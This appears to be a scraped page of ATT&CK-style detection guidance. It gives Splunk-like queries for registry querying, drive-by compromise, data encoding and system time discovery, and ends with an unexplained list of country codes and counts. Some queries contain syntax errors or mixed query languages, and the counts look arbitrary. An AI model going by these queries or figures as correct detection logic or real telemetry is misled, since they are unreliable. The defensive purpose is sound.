(sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") | search (CommandLine LIKE "%reg%" AND CommandLine LIKE "%query%") OR (CommandLine LIKE "%Registry%" AND (CommandLine LIKE "%HKEY_CLASSES_ROOT%" OR CommandLine "%HKCR%"))

Analytic 2 - reg.exe spawned from suspicious cmd.exe

((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") | WHERE (Image LIKE "%reg.exe%" AND ParentImage LIKE "%cmd.exe%")| rename ProcessParentGuid as guid| join type=inner guid[ | search ((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") AND (Image LIKE "%cmd.exe%" AND ParentImage NOT LIKE "%explorer.exe%")| rename ProcessGuid as guid ]

Analytic 3 - Rare LolBAS command lines

((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND Image IN ('FilePathToLolbasProcess01.exe','FilePathToLolbasProcess02.exe') AND number_standard_deviations = 1.5| select Image, ProcessCount, AVG(ProcessCount) Over() - STDEV(ProcessCount) Over() * number_standard_deviations AS LowerBound | WHERE ProcessCount < LowerBound

DS0024

Windows Registry

Windows Registry Key Access

Monitor for unexpected process interactions with the Windows Registry (i.e. reads) that may be related to gathering information.

Note: For Security Auditing event ids 4656 and 4663, a System Access Control List (SACL) that controls the use of specific access rights such as Enumerate sub-keys and Query key value is required for event generation. Depending on the Registry key you are monitoring, the implementation of a new System Access Control List (SACL) might be required. Depending of Registry key used for the creation of a System Access Control List (SACL), the generation of event ids 4656 and 4663 might be noisy.

Analytic 1 - Suspicious Registry

(sourcetype="WinEventLog:Security" EventCode IN (4663, 4656)) AND ObjectType="Key" | WHERE ObjectName LIKE "%SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall%" AND (UserAccessList LIKE "%4435%" OR UserAccessList LIKE "%Enumerate sub-keys%" OR UserAccessList LIKE "%4432%" OR UserAccessList LIKE "%Query key value%") AND Image NOT IN ('FilePathToExpectedProcess01.exe','FilePathToExpectedProcess02.exe')



T1132 - Data Encoding


ID

Data Source

Data Component

Detects

DS0029

Network Traffic

Network Traffic Content

Monitor for network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols and packet contents.


T1189 - Drive-by Compromise


ID

Data Source

Data Component

Detects

DS0015

Application Log

Application Log Content

Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.

DS0022

File

File Creation

Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing. Detect browser process dropping files in suspicious locations (AppData, Temp, /tmp, /var/tmp). Identify exploit payloads (DLLs, JavaScript, shell scripts) written by the browser process.

(sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 Image="C:\Program Files\Mozilla Firefox\firefox.exe" OR Image="C:\Program Files\Google\Chrome\Application\chrome.exe")OR (sourcetype="/var/log/audit/audit.log" SYSCALL="open" path="/tmp/%" process="firefox" OR process="chrome")| eval risk_score = case( like(path, "%\Temp\%"), 5, like(path, "%AppData%"), 4, like(path, "%/var/tmp%"), 6)| where risk_score >= 5| table _time, host, process, path, risk_score

DS0029

Network Traffic

Network Connection Creation

Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data. Identify browser processes initiating connections to known malicious domains.Detect browser requests to suspicious IPs or domains classified under newly registered domains.Look for anomalous DNS queries and HTTP request patterns.

(sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3 process="chrome.exe" OR process="firefox.exe")OR (source="cloud_dns_logs" category="newly_registered_domain")OR (source="/var/log/zeek/conn.log" dest_ip IN (malicious_ip_list))| stats count by src_ip, dest_ip, domain, process| where count > 5



Network Traffic Content

Detect suspicious script execution over HTTP/S. Identify JavaScript payloads with obfuscation or encoded execution. Look for exploit attempts in network payloads.

(EventCode=5156 dest_port=80 OR dest_port=443 process="chrome.exe" OR process="firefox.exe")OR (source="/var/log/zeek/http.log" method="GET" uri IN (suspicious_js_files))| stats count by src_ip, dest_ip, uri, user_agent| where count > 3

DS0009

Process

Process Creation

Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, or evidence of Discovery.


T1124 - System Time Discovery


ID

Data Source

Data Component

Detects

DS0017

Command

Command Execution

Monitor executed commands and arguments for actions that may gather the system time and/or time zone from a local or remote system.

DS0009

Process

OS API Execution

Monitor for API calls that may gather the system time and/or time zone from a local or remote system. Remote access tools with built-in features may interact directly with the Windows API to gather information.



Process Creation

Monitor for newly executed processes that may gather the system time and/or time zone from a local or remote system.

Observed Countries250

AD (998)
AE (263)
AF (798)
AG (386)
AI (237)
AL (463)
AM (55)
AO (51)
AQ (513)
AR (948)
AS (406)
AT (653)
AU (54)
AW (703)
AX (437)
AZ (196)
BA (107)
BB (507)
BD (90)
BE (694)
BF (515)
BG (965)
BH (474)
BI (841)
BJ (925)
BL (338)
BM (625)
BN (469)
BO (277)
BQ (981)
BR (529)
BS (135)
BT (62)
BV (442)
BW (404)
BY (812)
BZ (321)
CA (801)
CC (318)
CD (54)
CF (683)
CG (988)
CH (680)
CI (187)
CK (505)
CL (903)
CM (921)
CN (6)
CO (664)
CR (606)
CU (413)
CV (416)
CW (132)
CX (538)
CY (554)
CZ (426)
DE (978)
DJ (982)
DK (247)
DM (823)
DO (13)
DZ (377)
EC (415)
EE (642)
EG (69)
EH (239)
ER (403)
ES (851)
ET (244)
FI (14)
FJ (143)
FK (292)
FM (495)
FO (978)
FR (942)
GA (647)
GB (909)
GD (734)
GE (616)
GF (486)
GG (690)
GH (75)
GI (303)
GL (313)
GM (476)
GN (67)
GP (7)
GQ (34)
GR (787)
GS (706)
GT (532)
GU (399)
GW (485)
GY (738)
HK (229)
HM (675)
HN (94)
HR (338)
HT (492)
HU (698)
ID (409)
IE (727)
IL (873)
IM (966)
IN (851)
IO (115)
IQ (787)
IR (752)
IS (823)
IT (200)
JE (279)
JM (69)
JO (170)
JP (802)
KE (697)
KG (452)
KH (509)
KI (368)
KM (824)
KN (500)
KP (926)
KR (403)
KW (439)
KY (303)
KZ (454)
LA (851)
LB (398)
LC (62)
LI (532)
LK (340)
LR (752)
LS (643)
LT (4)
LU (728)
LV (569)
LY (228)
MA (108)
MC (153)
MD (895)
ME (721)
MF (184)
MG (776)
MH (68)
MK (357)
ML (447)
MM (21)
MN (17)
MO (226)
MP (705)
MQ (804)
MR (601)
MS (113)
MT (455)
MU (564)
MV (727)
MW (964)
MX (36)
MY (119)
MZ (628)
NA (833)
NC (408)
NE (282)
NF (249)
NG (130)
NI (322)
NL (822)
NO (884)
NP (899)
NR (763)
NU (559)
NZ (792)
OM (162)
PA (439)
PE (878)
PF (437)
PG (871)
PH (191)
PK (509)
PL (814)
PM (307)
PN (37)
PR (654)
PS (815)
PT (654)
PW (508)
PY (174)
QA (179)
RE (328)
RO (637)
RS (886)
RU (320)
RW (816)
SA (594)
SB (390)
SC (445)
SD (105)
SE (939)
SG (517)
SH (66)
SI (593)
SJ (182)
SK (688)
SL (463)
SM (740)
SN (389)
SO (806)
SR (112)
SS (602)
ST (471)
SV (522)
SX (987)
SY (959)
SZ (11)
TC (195)
TD (460)
TF (884)
TG (3)
TH (830)
TJ (405)
TK (75)
TL (793)
TM (355)
TN (37)
TO (880)
TR (115)
TT (91)
TV (970)
TW (896)
TZ (437)
UA (322)
UG (547)
UM (707)
US (744)
UY (461)
UZ (325)
VA (329)
VC (330)
VE (111)
VG (914)
VI (281)
VN (856)
VU (736)
WF (384)
WS (17)
XK (824)
YE (828)
YT (464)
ZA (429)
ZM (618)
ZW (945)